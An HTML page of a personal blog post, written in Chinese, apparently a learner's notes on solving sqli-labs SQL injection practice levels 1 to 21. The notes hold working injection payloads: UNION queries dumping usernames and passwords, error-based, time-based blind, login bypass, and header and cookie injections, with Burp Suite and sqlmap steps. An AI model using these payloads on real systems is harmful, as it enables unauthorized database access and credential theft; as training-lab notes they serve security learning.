<!DOCTYPE html>
<html lang="en">

<!-- Head tag -->
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="google-site-verification" content="xBT4GhYoi5qRD5tr338pgPM5OWHHIDR6mNg1a3euekI" />
    <meta name="baidu-site-verification" content="093lY4ziMu" />
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
    <meta name="description" content="blog-wxx">
    <meta name="keyword"  content="wxx">
    <link rel="shortcut icon" href="/img/ironman-draw.png">
    <!-- Place this tag in your head or just before your close body tag. -->
    <script async defer src="https://buttons.github.io/buttons.js"></script>
    <!--<link href='http://fonts.googleapis.com/css?family=Montserrat:400,700' rel='stylesheet' type='text/css'>-->
    <title>
        
          sql的一些笔记 - wxx&#39;s_Blog
        
    </title>

    <link rel="canonical" href="https://github.com/wxx0105/wxx0105.github.io/2021/10/16/sql的一些笔记/">

    <!-- Bootstrap Core CSS -->
    
<link rel="stylesheet" href="/css/bootstrap.min.css">


    <!-- Custom CSS --> 
    
        
<link rel="stylesheet" href="/css/dusign-dark.css">

        
<link rel="stylesheet" href="/css/dusign-common-dark.css">

        
<link rel="stylesheet" href="/css/font-awesome.css">

        
<link rel="stylesheet" href="/css/toc.css">

    
    
    <!-- Pygments Highlight CSS -->
    
<link rel="stylesheet" href="/css/highlight.css">


    
<link rel="stylesheet" href="/css/widget.css">


    
<link rel="stylesheet" href="/css/rocket.css">


    
<link rel="stylesheet" href="/css/signature.css">


    
<link rel="stylesheet" href="/css/fonts.googleapis.css">


    <link rel="stylesheet" href="//cdn.bootcss.com/font-awesome/4.3.0/css/font-awesome.min.css">

    <!-- photography -->
    
<link rel="stylesheet" href="/css/photography.css">


    <!-- ga & ba script hoook -->
    <script></script>
<meta name="generator" content="Hexo 4.2.1"></head>


<!-- hack iOS CSS :active style -->
<body ontouchstart="">

    <!-- background effects start -->
    
    <!-- background effects end -->

	<!-- Modified by Yu-Hsuan Yen -->
<!-- Post Header -->
<style type="text/css">
    header.intro-header{
        
            
                background-image: linear-gradient(rgba(0, 0, 0, 0.3), rgba(0, 0, 0, 0.5)), url('../../../../img/wallhaven-n61ey6.jpg')
                /*post*/
            
        
    }
    
</style>

<header class="intro-header" >
    <!-- Signature -->
    <div id="signature">
        <div class="container">
            <div class="row">
                <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                
                    <div class="post-heading">
                        <div class="tags">
                            
                              <a class="tag" href="/tags/#sql" title="sql">sql</a>
                            
                        </div>
                        <h1>sql的一些笔记</h1>
                        <h2 class="subheading"></h2>
                        <span class="meta">
                            Posted by wx_x on
                            2021-10-16
                        </span>

                        
                            <div class="blank_box"></div>
                            <span class="meta">
                                Words <span class="post-count">2.5k</span> and
                                Reading Time <span class="post-count">9</span> Minutes
                            </span>
                            <div class="blank_box"></div>
                            <!-- 不蒜子统计 start -->
                            <span class="meta">
                                Viewed <span id="busuanzi_value_page_pv"><i class="fa fa-spinner fa-spin"></i></span> Times
                            </span>
                            <!-- 不蒜子统计 end -->
                        

                    </div>
                

                </div>
            </div>
        </div>      
    </div>

    
    <div class="waveWrapper">
        <div class="wave wave_before" style="background-image: url('/img/wave-dark.png')"></div>
        <div class="wave wave_after" style="background-image: url('/img/wave-dark.png')"></div>
    </div>
    
</header>

	
    <!-- Navigation -->
<nav class="navbar navbar-default navbar-custom navbar-fixed-top">
    <div class="container-fluid">
        <!-- Brand and toggle get grouped for better mobile display -->
        <div class="navbar-header page-scroll">
            <button type="button" class="navbar-toggle">
                <span class="sr-only">Toggle navigation</span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
            </button>
            <a class="navbar-brand" href="/">wxx</a>
        </div>

        <!-- Collect the nav links, forms, and other content for toggling -->
        <!-- Known Issue, found by Hux:
            <nav>'s height woule be hold on by its content.
            so, when navbar scale out, the <nav> will cover tags.
            also mask any touch event of tags, unfortunately.
        -->
        <div id="huxblog_navbar">
            <div class="navbar-collapse">
                <ul class="nav navbar-nav navbar-right">
                    <li>
                        <a href="/">Home</a>
                    </li>

                    

                        
                    

                        
                        <li>
                            <a href="/about/">About</a>
                        </li>
                        
                    

                        
                        <li>
                            <a href="/photography/">Photography</a>
                        </li>
                        
                    

                        
                        <li>
                            <a href="/archive/">Archives</a>
                        </li>
                        
                    

                        
                        <li>
                            <a href="/tags/">Tags</a>
                        </li>
                        
                    
                    
                    
                </ul>
            </div>
        </div>
        <!-- /.navbar-collapse -->
    </div>
    <!-- /.container -->
</nav>
<script>
    // Drop Bootstarp low-performance Navbar
    // Use customize navbar with high-quality material design animation
    // in high-perf jank-free CSS3 implementation
    var $body   = document.body;
    var $toggle = document.querySelector('.navbar-toggle');
    var $navbar = document.querySelector('#huxblog_navbar');
    var $collapse = document.querySelector('.navbar-collapse');

    $toggle.addEventListener('click', handleMagic)
    function handleMagic(e){
        if ($navbar.className.indexOf('in') > 0) {
        // CLOSE
            $navbar.className = " ";
            // wait until animation end.
            setTimeout(function(){
                // prevent frequently toggle
                if($navbar.className.indexOf('in') < 0) {
                    $collapse.style.height = "0px"
                }
            },400)
        }else{
        // OPEN
            $collapse.style.height = "auto"
            $navbar.className += " in";
        }
    }
</script>


    <!-- Main Content -->
    <!-- Post Content -->
<article>
    <div class="container">
        <div class="row">

            <!-- Post Container -->
            <div class="
                col-lg-8 col-lg-offset-2
                col-md-10 col-md-offset-1
                post-container">

                <a id="more"></a>
<h1 id="sql注入小记："><a href="#sql注入小记：" class="headerlink" title="sql注入小记："></a>sql注入小记：</h1><h2 id="less-1"><a href="#less-1" class="headerlink" title="less-1"></a>less-1</h2><p>可以查看源代码知道id走向，知道他是直接被填了进去（无任何过滤以及转义？），也就是我们可以直接改变提交进数据库的参数，达到注入条件，使用id为参数注入。<br>?id=-1’ union select 1,2,3—+<br>?id=-1’ union select 1,2,database()—+<br>?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’security’—+<br>?id=-1’ union select 1,2,group_concat(username) from security.users—+<br>?id=-1’ union select 1,2,group_concat(password) from security.users—+</p>
<h2 id="less-2"><a href="#less-2" class="headerlink" title="less-2"></a>less-2</h2><p>?id=1 and 1=2 union select 1,2,3—+<br>重复less-1…..</p>
<h2 id="less-3-先基础注入"><a href="#less-3-先基础注入" class="headerlink" title="less-3:先基础注入"></a>less-3:先基础注入</h2><p>例：<br>?id=1’ 然后看报错，也可以看他的php文件，发现递交上去的时候的语句：$sql=”SELECT * FROM users WHERE id=(‘$id’) LIMIT 0,1”;<br>那我就判断这个是单引号字符型注入，只不过需要括号来闭合。<br>?id=1’) 开始尝试，报错<br>?id=1’)—+加上注释之后，回显正常<br>所以?id=-1’)<payload>—+即可开始注入。(这里注意传参要改为-1，我理解的是数据库里没有-1的数据）<br>less-4：观看源码以及题目提示可以知道，less-3的基础上，单引号改为双引号即可。<br>?id=-1”) union select 1,2,3—+</p>
<h2 id="less-5："><a href="#less-5：" class="headerlink" title="less-5："></a>less-5：</h2><p>因为这里并不是完全的无回显，所以我们试试updatexml报错注入：?id=1’ and updatexml(1,concat(0x5e,(select group_concat(username,0x7e,password) from users),0x5e),1) —+<br>因为这里有回显，但是没有数字，所以可以采用!!!布尔盲注，报错注入，或者时间盲注，故可以使用sqlmap跑。</p>
<h2 id="less-6："><a href="#less-6：" class="headerlink" title="less-6："></a>less-6：</h2><p>观看源代码可以发现，输入的id使用“包裹，其余和第五关一致，所以只需要我们换成双引号即可。：?id=1”…………同less-5</p>
<h2 id="less-7"><a href="#less-7" class="headerlink" title="less-7:"></a>less-7:</h2><p>into outfile命令：select into outfile命令作用将查询结果输出保存到一个文件中<br>提示use outfile说明开放了读写权限<br>不会！！1<br>less-8：先看题目，涉及到布尔盲注，再看源码，发现是单引号注入，然后就想到布尔盲注可以通过加载时间来判断<br>?id=1’ 无回显<br>?id=1’—+加注释之后，回显you are in<br>?id=1’ and if(substr(database(),1,1)=’s’,sleep(5),sleep(2))—+然后通过回显时间即可判断首字母是否是s。<br>爆思路：爆数据库名，爆表名，爆段。<br>由于工作量较大，所以可以采用sqlmap。</p>
<h2 id="less-9"><a href="#less-9" class="headerlink" title="less-9:"></a>less-9:</h2><p>页面一直保持同一个回显，可以尝试时间布尔注入，可行，采用报错注入，可行，同less-5<br>查看源码可以发现是单引号注入<br>?id=1’ and if(substr(database(),1,1)=’s’,sleep(5),sleep(1))—+//也可使用sqlmap<br>less-5报错注入updatexml函数<br>less-10：<br>观看源码或者题目，把less-9中参数单引号改为双引号即可。<br>?id=1” and if(substr(database(),1,1)=’s’,sleep(5),sleep(1))—+//也可使用sqlmap</p>
<p>！！！<br>4.11-我在看burp suite使用方法,因为后续less-11需要用到。<br>在此记录burp使用方法：（Gitbook《burp suite实战指南》<a href="https://t0data.gitbooks.io/burpsuite/content/chapter1.html）" target="_blank" rel="noopener">https://t0data.gitbooks.io/burpsuite/content/chapter1.html）</a><br>2g运行内存分配启动-cmd：java -jar -Xmx2G  C:\Users\Administrator.DESKTOP-VEKHJV0\Desktop\BurpUnlimited\BurpUnlimited.jar<br>看了一下午，三个多钟，发现看的还没有问lsj指点一二透彻，不禁让我想到牛顿所谓的站在巨人肩膀上的感觉。。。绝绝子，今晚回去英雄联盟。</p>
<pre><code>GET请求
</code></pre><p>url传达参数<br>提交的信息会显示在url中<br>可以在url中进行sql注入</p>
<pre><code>POST请求
</code></pre><p>提交的信息不会回显在url中，安全性相对更高，可以抓包或者利用插件修改post提交的信息<br>表单提交<br>通常有框框，常见比如登陆页面的账号框密码框啥的.<br>可以在框框里注入<br>也可以使用hackbar中的enable post或者burpsuite抓包</p>
<h2 id="less-11"><a href="#less-11" class="headerlink" title="less-11"></a>less-11</h2><p>操作：打开burp后，cmd：ipconfig查看所连接外网方式的ip（用wifi则看无线局域网适配器，连接网线则看以太网适配器，当然没有连接的不会显示）<br>找到之后，将10.2.185.244把sqli-labs网页的127.0.0.1更换，也就是 10.2.185.244/sqli-labs/less-11/，才可以进行抓包。</p>
<p>抓到包后，点击action到repeater一步一步尝试，repeater是一个可以重复请求与响应的burp的功能模块。<br>为什么这一关用burp爆，而不直接网页爆呢？<br>都可以。都可以爆。<br>那么接下来就是说burp的repeater上进行的操作：uname=（这里只要闭合就行，原因我不知道，可能还需深入学习）’ union select 1,database()—+&amp;passwd=&amp;submit=Submit<br>ps：只有在密码行输入sql注入语句才可以加上admin在单引号前边，问sj说是因为先查询到username（原句）</p>
<p>在网页爆需要进入hackbar，然后看题目是基于错误的post型单引号字节，所以hackbar里面要点击enable POST,在body一栏写入注入语句，而且要先在username输入一些东西，提交之后才可以在hackbar进入post模式</p>
<h2 id="less-12（基于错误的双引号POST型字符型注入）"><a href="#less-12（基于错误的双引号POST型字符型注入）" class="headerlink" title="less-12（基于错误的双引号POST型字符型注入）"></a>less-12（基于错误的双引号POST型字符型注入）</h2><p>与less-11相同，在hackbar进入post之后，同11步骤，但是在sql语句要加上恒错语句，and 1=2 在单引号后才可以正常进行注入。</p>
<h2 id="less-13-POST单引号变形双注入"><a href="#less-13-POST单引号变形双注入" class="headerlink" title="less-13(POST单引号变形双注入)"></a>less-13(POST单引号变形双注入)</h2><p>正常尝试，发现为单引号括号闭合，但是admin’) or 1—+登录后无回显，如less-5，<br>这里可以使用报错注入 uname=admin’) and extractvalue(1,concat(0x7e,(select database()))) —+（post注入一般采用‘#’替换‘—+’，这里不替换也可以）<br>这里也可以使用时间盲注，sqlmap可以，burp也可以，uname=admin’) and if(substr(database(),1,1)=’s’,sleep(5),sleep(1))—+</p>
<h2 id="less-14-POST双引号变形双注入"><a href="#less-14-POST双引号变形双注入" class="headerlink" title="less-14(POST双引号变形双注入)"></a>less-14(POST双引号变形双注入)</h2><p>正常尝试，根据题目我直接双引号，发现不用括号也可以注。<br>这里可以使用报错注入 uname=admin” and extractvalue(1,concat(0x7e,(select database()))) —+<br>这里也可以使用时间盲注，sqlmap可以，burp也可以，uname=admin” and if(substr(database(),1,1)=’s’,sleep(5),sleep(1))—+</p>
<h2 id="less-15-基于bool型、时间延迟单引号POST型盲注"><a href="#less-15-基于bool型、时间延迟单引号POST型盲注" class="headerlink" title="less-15(基于bool型、时间延迟单引号POST型盲注)"></a>less-15(基于bool型、时间延迟单引号POST型盲注)</h2><p>admin尝试，完全无回显，考虑到bool型盲注<br>于是尝试万能密码（很多时候可以来判断是怎么类型的闭合，这里我尝试了’ and 1=2#/‘ and 1=1#/-&gt;不行）：213’ or 1#：显示登陆成功，说明是单引号注入。<br>于是开始less-8的过程，通过sleep函数来判断，可以采用sqlmap.</p>
<h2 id="less-16（基于bool型、时间延迟的双引号POST型盲注）"><a href="#less-16（基于bool型、时间延迟的双引号POST型盲注）" class="headerlink" title="less-16（基于bool型、时间延迟的双引号POST型盲注）"></a>less-16（基于bool型、时间延迟的双引号POST型盲注）</h2><p>根据题目吗，使用万能密码（里面的or是他万能的原因）123” or 1#，诶，不行！<br>再次尝试括号，123”) or 1#，诶，可以了。<br>然后爆库，爆表。。。。。。。</p>
<h2 id="less-17（基于错误的更新查询POST注入）"><a href="#less-17（基于错误的更新查询POST注入）" class="headerlink" title="less-17（基于错误的更新查询POST注入）"></a>less-17（基于错误的更新查询POST注入）</h2><p>初次尝试：无论输入任何万能密码都不行还骂我bugoff<br>再次尝试我发现是一道没有回显的（指的是没有回显数据的），让我想到了bool型注入。<br>但是我还是查看来了一下源码，发现和之前的不一样，题目也不一样，很新鲜，检查对比之后发现uname被check-input函数包围，一看就不是善茬，我没看懂，但是我注意到password没有被包围。<br>所以这题可能在password里注入，<br>uname：admin<br>password：1’ and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)#（因为无回显，所以采用报错注入，时间的话我这边不行，500错误）</p>
<h2 id="less-18-基于错误的用户代理，头部POST注入"><a href="#less-18-基于错误的用户代理，头部POST注入" class="headerlink" title="less-18(基于错误的用户代理，头部POST注入)"></a>less-18(基于错误的用户代理，头部POST注入)</h2><p>估计版本不对劲，一直没有回显，唯一的会显的是我的ip地址，和网页的登录失败。<br>解决办法：<a href="http://119.3.217.40/去docker下的靶场。非常的棒，抓包也可以正常抓包。" target="_blank" rel="noopener">http://119.3.217.40/去docker下的靶场。非常的棒，抓包也可以正常抓包。</a><br>看了参考，主要是 考察host头部注入，表面测试了一两次admin，就去看php源文件，与17题进行比较，发现这一次uname和password都被check了，但是在头部信息ua中发现是直接获取与提交的，也就是没有任何过滤。<br>于是这题可以在ua进行注入：<br>打开burp，抓less-18的包，修改ua信息，发现是单引号报错，于是可以使用报错注入，在成熟的数据库，是不会有报错信息回显！<br>就进行报错注入：外到内<br>extractvalue(1,concat(0x7e,(select database())))<br>extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))<br>extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=’users’)))<br>extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))</p>
<h2 id="less-19"><a href="#less-19" class="headerlink" title="less-19"></a>less-19</h2><p>通过题目以及源码发现，这次还是头post部注入，那么这次发现可以注入的是头部的referer，使用hackbar也可以注入：<br>先登录一次admin admin，然后load到hackbar上，add header 选择注入的头部信息，这次选择referer，在value打上sql语句。</p>
<h2 id="less-20"><a href="#less-20" class="headerlink" title="less-20"></a>less-20</h2><p>登录之后，发现多了个cookie信息，然后就去查看源码，不出意外，uname和password都被check了起来，于是根据回显，找关于cookie的代码<br>发现查询语句查询了cookie，于是burp抓包去找cookie，发现了熟悉的伙伴，Cookie: uname=admin，马上就加个单引号go，报错，不行，果然加上—+回显正常，<br>这里就开始判断长度，这里不能有进行sql语句执行的时候，uname要为空，也就是Cookie: uname=’ order by 3—+; PHPSESSID=3ug6rq6irnolu8o08jo10i21s5;（我也不懂！）<br>正常的爆破即可。（抓包的时候注意看cookie，cookie有uname才抓！）<br>可以进行报错注入，时间盲注也可以。<br>有时候对于头部注入—+不好用，可以使用#进行闭合<br>！！！对于—+与#注释还不是很了解</p>
<h2 id="less-21"><a href="#less-21" class="headerlink" title="less-21"></a>less-21</h2><p>查看源码，以及题目可以知道这一题还是cookie注入，但是这里是需要经过base64编码之后的sql语句。<br>1.可以在网页注入，还是hackbar：admin进入后，再点击load，此时 enable post，点击add header，输入cookie，通过bp抓包得到cookie的格式是uname=payload（base64编码）<br>2.在bp上直接改头部的cookie信息 。</p>

                
                <hr>
                <!-- Pager -->
                <ul class="pager">
                    
                    <li class="previous">
                        <a href="/2021/10/16/sql的一些知识/" data-toggle="tooltip" data-placement="top" title="sql的一些知识">&larr; Previous Post</a>
                    </li>
                    
                    
                    <li class="next">
                        <a href="/2019/11/01/Hexo-Theme-Snail/" data-toggle="tooltip" data-placement="top" title="Hexo-Theme-Snail">Next Post &rarr;</a>
                    </li>
                    
                </ul>

                <!-- tip start -->
                

                
                <div class="comment_notes">
                    <p>
                        本博客所有文章除特别声明外，均采�? CC BY-SA 4.0 协议 ，转载请注明出处�?
                    </p>
                </div>
                
                <!-- tip end -->

                <!-- Music start-->
                
                
<link rel="stylesheet" href="/css/music-player/fonts/iconfont.css">


<link rel="stylesheet" href="/css/music-player/css/reset.css">


<link rel="stylesheet" href="/css/music-player/css/player.css">


<div class="music-player">
    <audio class="music-player__audio" ></audio>
    <div class="music-player__main">
        <div class="music-player__blur"></div>
        <div class="music-player__disc">
            <div class="music-player__image">
                <img width="100%" src="" alt="">
            </div>
            <div class="music-player__pointer"><img width="100%" src="/img/cd_tou.png" alt=""></div>
        </div>
        <div class="music-player__controls">
            <div class="music__info">
                <h3 class="music__info--title">...</h3>
                <p class="music__info--singer">...</p>
            </div>
            <div class="player-control">
                <div class="player-control__content">
                    <div class="player-control__btns">
                        <div class="player-control__btn player-control__btn--prev"><i class="iconfont icon-prev"></i></div>
                        <div class="player-control__btn player-control__btn--play"><i class="iconfont icon-play"></i></div>
                        <div class="player-control__btn player-control__btn--next"><i class="iconfont icon-next"></i></div>
                        <div class="player-control__btn player-control__btn--mode"><i class="iconfont icon-loop"></i></div>
                    </div>
                    <div class="player-control__volume">
                        <div class="control__volume--icon player-control__btn"><i class="iconfont icon-volume"></i></div>
                        <div class="control__volume--progress player_progress"></div>
                    </div>
                </div>
                <div class="player-control__content">
                    <div class="player__song--progress player_progress"></div>
                    <div class="player__song--timeProgess nowTime">00:00</div>
                    <div class="player__song--timeProgess totalTime">00:00</div>
                </div>
            </div>
        </div>
    </div>
</div>


<script src="/js/music-player/utill.js"></script>


<script src="/js/music-player/jquery.min.js"></script>

<!-- netease; qqkg -->
<!--
<script src="/js/music-player/player.js?library=config.music.library.js"></script>
-->
<script src="../../../../js/music-player/player.js?library=netease&music=https://kg.qq.com/node/play?s=7deFpz7Z26Jmv7di&g_f=share_html"></script>
                
                <!-- Music end -->

                <!-- Sharing -->
                
                <div class="social-share"  data-wechat-qrcode-helper="" align="center"></div>
                <!--  css & js -->
                <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/css/share.min.css">
                <script src="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script>
                
                <!-- Sharing -->

                <!-- gitment start -->
                
                <!-- gitment end -->

                <!-- 来必力City版安装代码 -->
                
                <!-- City版安装代码已完成 -->

                <!-- disqus comment start -->
                
                <!-- disqus comment end -->
            </div>
            
            <!-- Tabe of Content -->
            <!-- Table of Contents -->

    
      
        <aside id="sidebar">
          <div id="toc" class="toc-article">
          <strong class="toc-title">Contents</strong>
          
            
              <ol class="toc-nav"><li class="toc-nav-item toc-nav-level-1"><a class="toc-nav-link" href="#sql注入小记："><span class="toc-nav-number">1.</span> <span class="toc-nav-text">sql注入小记：</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#less-1"><span class="toc-nav-number">1.1.</span> <span class="toc-nav-text">less-1</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#less-2"><span class="toc-nav-number">1.2.</span> <span class="toc-nav-text">less-2</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#less-3-先基础注入"><span class="toc-nav-number">1.3.</span> <span class="toc-nav-text">less-3:先基础注入</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#less-5："><span class="toc-nav-number">1.4.</span> <span class="toc-nav-text">less-5：</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#less-6："><span class="toc-nav-number">1.5.</span> <span class="toc-nav-text">less-6：</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#less-7"><span class="toc-nav-number">1.6.</span> <span class="toc-nav-text">less-7:</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#less-9"><span class="toc-nav-number">1.7.</span> <span class="toc-nav-text">less-9:</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#less-11"><span class="toc-nav-number">1.8.</span> <span class="toc-nav-text">less-11</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#less-12（基于错误的双引号POST型字符型注入）"><span class="toc-nav-number">1.9.</span> <span class="toc-nav-text">less-12（基于错误的双引号POST型字符型注入）</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#less-13-POST单引号变形双注入"><span class="toc-nav-number">1.10.</span> <span class="toc-nav-text">less-13(POST单引号变形双注入)</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#less-14-POST双引号变形双注入"><span class="toc-nav-number">1.11.</span> <span class="toc-nav-text">less-14(POST双引号变形双注入)</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#less-15-基于bool型、时间延迟单引号POST型盲注"><span class="toc-nav-number">1.12.</span> <span class="toc-nav-text">less-15(基于bool型、时间延迟单引号POST型盲注)</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#less-16（基于bool型、时间延迟的双引号POST型盲注）"><span class="toc-nav-number">1.13.</span> <span class="toc-nav-text">less-16（基于bool型、时间延迟的双引号POST型盲注）</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#less-17（基于错误的更新查询POST注入）"><span class="toc-nav-number">1.14.</span> <span class="toc-nav-text">less-17（基于错误的更新查询POST注入）</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#less-18-基于错误的用户代理，头部POST注入"><span class="toc-nav-number">1.15.</span> <span class="toc-nav-text">less-18(基于错误的用户代理，头部POST注入)</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#less-19"><span class="toc-nav-number">1.16.</span> <span class="toc-nav-text">less-19</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#less-20"><span class="toc-nav-number">1.17.</span> <span class="toc-nav-text">less-20</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#less-21"><span class="toc-nav-number">1.18.</span> <span class="toc-nav-text">less-21</span></a></li></ol></li></ol>
            
          
          </div>
        </aside>
      
    

                
            <!-- Sidebar Container -->
            <div class="
                col-lg-8 col-lg-offset-2
                col-md-10 col-md-offset-1
                sidebar-container">

                <!-- Featured Tags -->
                
                <section>
                    <!-- no hr -->
                    <h5><a href="/tags/">FEATURED TAGS</a></h5>
                    <div class="tags">
                       
                          <a class="tag" href="/tags/#sql" title="sql">sql</a>
                        
                    </div>
                </section>
                

                <!-- Friends Blog -->
                
                <hr>
                <h5>FRIENDS</h5>
                <ul class="list-inline">

                    
                        <li><a href="http://na0h.cn/" target="_blank">间隔</a></li>
                    
                        <li><a href="https://hututu-w.github.io/" target="_blank">冰洁</a></li>
                    
                        <li><a href="https://gutoom.github.io/" target="_blank">Master_Zhang</a></li>
                    
                        <li><a href="https://saltyfishyjk.github.io/" target="_blank">saltyfishyjk</a></li>
                    
                        <li><a href="http://lyxx.link/" target="_blank">林会安全</a></li>
                    
                </ul>
                
            </div>
        </div>
    </div>
</article>




<!-- async load function -->
<script>
    function async(u, c) {
      var d = document, t = 'script',
          o = d.createElement(t),
          s = d.getElementsByTagName(t)[0];
      o.src = u;
      if (c) { o.addEventListener('load', function (e) { c(null, e); }, false); }
      s.parentNode.insertBefore(o, s);
    }
</script>
<!-- anchor-js, Doc:http://bryanbraun.github.io/anchorjs/ -->
<script>
    async("https://cdn.bootcss.com/anchor-js/1.1.1/anchor.min.js",function(){
        anchors.options = {
          visible: 'hover',
          placement: 'left',
          icon: 'ℬ'
        };
        anchors.add().remove('.intro-header h1').remove('.subheading').remove('.sidebar-container h5');
    })
</script>


<style  type="text/css">
    /* place left on bigger screen */
    @media all and (min-width: 800px) {
        .anchorjs-link{
            position: absolute;
            left: -0.75em;
            font-size: 1.1em;
            margin-top : -0.1em;
        }
    }
</style>



    <!-- Footer -->
    <!-- Footer -->
<footer>
    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                <ul class="list-inline text-center">

                
                    <li>
                        <a target="_blank"  href="https://github.com/wxx0105">
                            <span class="fa-stack fa-lg">
                                <i class="fa fa-circle fa-stack-2x"></i>
                                <i class="fa fa-github fa-stack-1x fa-inverse"></i>
                            </span>
                        </a>
                    </li>
                

                

                

                

                

                

                

                </ul>
                <p class="copyright text-muted">
                    Copyright &copy; wx_x 2022 
                    <br>
                    Powered by 
                    <a href="https://github.com/dusign/hexo-theme-snail">
                        <i>hexo-theme-snail</i>
                    </a> | 
                    <iframe name="star" style="margin-left: 2px; margin-bottom:-5px;" frameborder="0" scrolling="0"
                        width="100px" height="20px"
                        src="https://ghbtns.com/github-btn.html?user=dusign&repo=hexo-theme-snail&type=star&count=true">
                    </iframe>
                </p>
            </div>
        </div>
    </div>

</footer>

<!-- jQuery -->

<script src="/js/jquery.min.js"></script>


<!-- Bootstrap Core JavaScript -->

<script src="/js/bootstrap.min.js"></script>


<!-- Custom Theme JavaScript -->

<script src="/js/hux-blog.min.js"></script>


<!-- Search -->

<script src="/js/search.js"></script>


<!-- async load function -->
<script>
    function async(u, c) {
      var d = document, t = 'script',
          o = d.createElement(t),
          s = d.getElementsByTagName(t)[0];
      o.src = u;
      if (c) { o.addEventListener('load', function (e) { c(null, e); }, false); }
      s.parentNode.insertBefore(o, s);
    }
</script>


<!-- jquery.tagcloud.js -->
<script>
    // only load tagcloud.js in tag.html
    if($('#tag_cloud').length !== 0){
        async("https://github.com/wxx0105/wxx0105.github.io/js/jquery.tagcloud.js",function(){
            $.fn.tagcloud.defaults = {
                //size: {start: 1, end: 1, unit: 'em'},
                color: {start: '#bbbbee', end: '#0085a1'},
            };
            $('#tag_cloud a').tagcloud();
        })
    }
</script>

<!--fastClick.js -->
<script>
    async("https://cdn.bootcss.com/fastclick/1.0.6/fastclick.min.js", function(){
        var $nav = document.querySelector("nav");
        if($nav) FastClick.attach($nav);
    })
</script>


<!-- Google Analytics -->


<script>
    // dynamic User by Hux
    var _gaId = 'UA-XXXXXXXX-X';
    var _gaDomain = 'yoursite';

    // Originial
    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
    (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
    })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

    ga('create', _gaId, _gaDomain);
    ga('send', 'pageview');
</script>




<!-- Baidu Tongji -->


<!-- Search -->

    <script type="text/javascript">      
        var search_path = "search.xml";
        if (search_path.length == 0) {
            search_path = "search.xml";
        }
    var path = "/" + search_path;
    searchFunc(path, 'local-search-input', 'local-search-result');
    </script>


<!-- busuanzi -->
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>






	<a id="rocket" href="#top" class=""></a>
	<script type="text/javascript" src="/js/totop.js?v=1.0.0" async=""></script>
    <script type="text/javascript" src="/js/toc.js?v=1.0.0" async=""></script>

    
        <!-- background effects line -->
        

        
            <script type="text/javascript" src="/js/mouse-click.js" content='[&#34;🌱&#34;,&#34;just do it wxx&#34;,&#34;🍀&#34;,&#34;🍂&#34;,&#34;🌈&#34;,&#34;🧿&#34;,&#34;🍁&#34;,&#34;🍇&#34;,&#34;🍍&#34;,&#34;🕌&#34;,&#34;⛩️&#34;]' color='[&#34;rgb(121,93,179)&#34; ,&#34;rgb(76,180,231)&#34; ,&#34;rgb(184,90,154)&#34;]'></script>
        

        <!-- background effects end -->
    

    <!--<script size="50" alpha='0.3' zIndex="-999" src="/js/ribbonStatic.js"></script>-->
    
        <script src="/js/ribbonDynamic.js"></script>
    
</body>

</html>
